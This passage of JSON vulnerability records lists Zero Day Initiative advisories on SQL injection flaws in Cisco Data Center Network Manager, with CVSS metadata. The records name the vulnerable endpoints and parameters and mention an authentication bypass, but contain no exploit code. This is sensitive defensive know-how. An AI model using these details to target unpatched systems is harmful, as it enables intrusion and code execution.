"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-095", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-095/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:09", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbAdminWSService/DbAdminWS service. When parsing the second parameter of the modifyGroupName endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager modifyGroupName SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-087", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-087/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getConfigBackupStatusCount endpoint of the WebAnalysisWSService/WebAnalysisWS service. When parsing the colFilterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getBackupStatusCount SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-046", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-046/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:46", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco 
Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel/vpcwizard/history endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcPeerHistory SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-023", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-023/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:08", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center 
Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the ConfigTemplateWSService/ConfigTemplateWS service. When parsing the sortField parameter of the exportConfigDeliveryJobTable endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getTaskList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-088", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-088/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/msm/sites service. When parsing the ip parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager createSite getIp SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-094", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-094/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:39", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network 
Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/isls endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getisls SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-036", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-036/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:37", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/topology endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getIslListWithPMForTopology SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-040", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-040/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:17", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getLanIslStatJoinList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslStatJoinList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-075", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-075/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:20", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data 
Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getOidSanStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-068", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-068/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations 
of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getSanIslStatJoinList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslStatJoinList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-072", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-072/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:38", "description": "This vulnerability allows remote attackers to execute arbitrary code on 
affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing a packet to the getSwitchListWithPortUse SOAP endpoint, the process does not properly validate a user-supplied string for the sortType parameter before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-038", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-038/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:35", "description": "This vulnerability allows remote 
attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/customPGStat endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getCustomPGStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-042", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-042/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:35", "description": "This vulnerability allows remote attackers to execute arbitrary 
code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/fcflowsStat endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getFlowStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-044", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-044/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:09", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of 
Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getFlowStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getFlowStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-089", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-089/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DiscoveryWSService/DiscoveryWS service. When processing the item parameter to the deepDiscoverForSelectedLanMembers endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager checkDiscoveryEthSwCandidates4List SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-093", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-093/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:51", "description": "This vulnerability allows remote 
attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of requests to the getSwitchsDataLength endpoint of the /DbInventoryWSService/DbInventoryWS service. When parsing the colFilterStr parameter in the getLanSwitchDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitchsDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 